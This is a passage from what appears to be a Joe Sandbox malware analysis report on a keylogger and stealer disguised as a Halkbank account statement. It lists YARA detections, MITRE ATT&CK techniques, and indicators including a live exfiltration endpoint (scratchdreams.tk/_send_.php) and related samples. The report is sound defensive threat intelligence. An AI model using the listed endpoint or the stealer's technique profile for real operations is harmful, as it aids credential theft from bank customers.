                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.6c00000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27d8e58.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27c81bc.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.27964d0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29803a8.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.29823c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.297f390.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1980117407.0000000002813000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                  DLL Side-Loading                  		111
                  Process Injection                  		1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  Query Registry                  		Remote Services1
                  Email Collection                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Security Software Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                  Virtualization/Sandbox Evasion                  		Security Account Manager1
                  Process Discovery                  		SMB/Windows Admin Shares1
                  Data from Local System                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection                  		NTDS31
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                  Obfuscated Files or Information                  		Cached Domain Credentials1
                  System Network Configuration Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Software Packing                  		DCSync13
                  System Information Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Timestomp                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  DLL Side-Loading                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Halkbank_Ekstre_20230426_075819_154055.exe56%VirustotalBrowse
                  Halkbank_Ekstre_20230426_075819_154055.exe45%ReversingLabsWin32.Ransomware.Loki
                  Halkbank_Ekstre_20230426_075819_154055.exe100%AviraHEUR/AGEN.1352067
                  Halkbank_Ekstre_20230426_075819_154055.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  SourceDetectionScannerLabelLink
                  reallyfreegeoip.org2%VirustotalBrowse
                  scratchdreams.tk17%VirustotalBrowse
                  checkip.dyndns.com0%VirustotalBrowse
                  checkip.dyndns.org0%VirustotalBrowse

                  URLs

                  SourceDetectionScannerLabelLink
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://tempuri.org/DataSeta.xsd)Microsoft0%Avira URL Cloudsafe
                  https://scratchdreams.tk100%Avira URL Cloudmalware
                  https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
                  https://reallyfreegeoip.org/xml/191.96.150.2250%Avira URL Cloudsafe
                  http://scratchdreams.tk17%VirustotalBrowse
                  https://scratchdreams.tk18%VirustotalBrowse
                  http://scratchdreams.tk100%Avira URL Cloudmalware
                  http://tempuri.org/DataSeta.xsd)Microsoft2%VirustotalBrowse
                  https://scratchdreams.tk/_send_.php?TS16%VirustotalBrowse
                  https://reallyfreegeoip.org/xml/191.96.150.225$0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		172.67.177.134
                  		truefalseunknown
                  scratchdreams.tk
                  		104.21.27.85
                  		truefalseunknown
                  checkip.dyndns.com
                  		132.226.247.73
                  		truefalseunknown
                  checkip.dyndns.org
                  		unknown
                  		unknowntrueunknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://checkip.dyndns.org/false
                  • URL Reputation: safe
                  		unknown
                  https://reallyfreegeoip.org/xml/191.96.150.225false
                  • Avira URL Cloud: safe
                  		unknown
                  https://scratchdreams.tk/_send_.php?TSfalse
                  • 16%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://tempuri.org/DataSeta.xsd)MicrosoftHalkbank_Ekstre_20230426_075819_154055.exefalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://checkip.dyndns.org/qHalkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://scratchdreams.tkHalkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 18%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  http://reallyfreegeoip.orgHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://reallyfreegeoip.orgHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://checkip.dyndns.orgHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B2F000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://checkip.dyndns.comHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://scratchdreams.tkHalkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B6B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 17%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    https://reallyfreegeoip.org/xml/191.96.150.225$Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B4E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AF8000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://reallyfreegeoip.org/xml/Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3221387842.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.177.134
                    		reallyfreegeoip.orgUnited States
                    		13335CLOUDFLARENETUSfalse
                    104.21.27.85
                    		scratchdreams.tkUnited States
                    		13335CLOUDFLARENETUSfalse
                    132.226.247.73
                    		checkip.dyndns.comUnited States
                    		16989UTMEMUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1435266
                    Start date and time:2024-05-02 11:54:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 10s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Halkbank_Ekstre_20230426_075819_154055.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 97%
                    • Number of executed functions: 156
                    • Number of non-executed functions: 14
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    11:54:51API Interceptor821567x Sleep call for process: Halkbank_Ekstre_20230426_075819_154055.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    172.67.177.134Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                      DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                        Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                          BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                            gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                              PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                  Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                        104.21.27.85DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                          PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                              e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            132.226.247.73M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • checkip.dyndns.org/
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            sample1.exeGet hashmaliciousSeclesBot, TrojanRansomBrowse
                                                            • checkip.dyndns.org/
                                                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/
                                                            8wvP84hzFu.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • checkip.dyndns.org/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            checkip.dyndns.comPO_287104.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            DNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 193.122.130.0
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                            • 193.122.130.0
                                                            SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                            • 193.122.6.168
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 193.122.6.168
                                                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 158.101.44.242
                                                            scratchdreams.tkDNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.27.85
                                                            58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.169.18
                                                            reallyfreegeoip.orgDNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.67.152
                                                            Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSU8uFcjIjAR.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                            • 104.21.76.57
                                                            noa.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 172.67.74.152
                                                            GX_MV Sunshine 07483032r_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            04302024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                            • 104.21.91.69
                                                            Setup (1).msiGet hashmaliciousUnknownBrowse
                                                            • 172.67.132.219
                                                            http://lib.xlsxpi.enoan2107.com:112Get hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            product.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                            • 104.21.74.191
                                                            cXPFfk0pBp7bEsb.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.26.12.205
                                                            UTMEMUSDEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 132.226.8.169
                                                            sQSqM58mvl.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                            • 128.169.78.71
                                                            tajma.x86-20240421-1027.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 128.169.79.206
                                                            M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • 132.226.247.73
                                                            74pdei4s1x.elfGet hashmaliciousMiraiBrowse
                                                            • 132.192.1.144
                                                            rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            kGbjOmkleq.elfGet hashmaliciousMiraiBrowse
                                                            • 132.226.89.207
                                                            BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            VI3 Operation Guide_tech Info versionfdp.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                            • 132.226.8.169
                                                            CLOUDFLARENETUSU8uFcjIjAR.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                            • 104.21.76.57
                                                            noa.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 172.67.74.152
                                                            GX_MV Sunshine 07483032r_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            04302024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            setup.msiGet hashmaliciousUnknownBrowse
                                                            • 104.21.91.69
                                                            Setup (1).msiGet hashmaliciousUnknownBrowse
                                                            • 172.67.132.219
                                                            http://lib.xlsxpi.enoan2107.com:112Get hashmaliciousUnknownBrowse
                                                            • 1.1.1.1
                                                            product.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                                            • 104.21.74.191
                                                            cXPFfk0pBp7bEsb.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.26.12.205

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adDNXS-04-22.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            G1lnGpOLK4.exeGet hashmaliciousNjratBrowse
                                                            • 172.67.177.134
                                                            SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.177.134
                                                            SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                            • 172.67.177.134
                                                            file.exeGet hashmaliciousGuLoader, PXRECVOWEIWOEI StealerBrowse
                                                            • 172.67.177.134
                                                            Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.67.177.134
                                                            1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
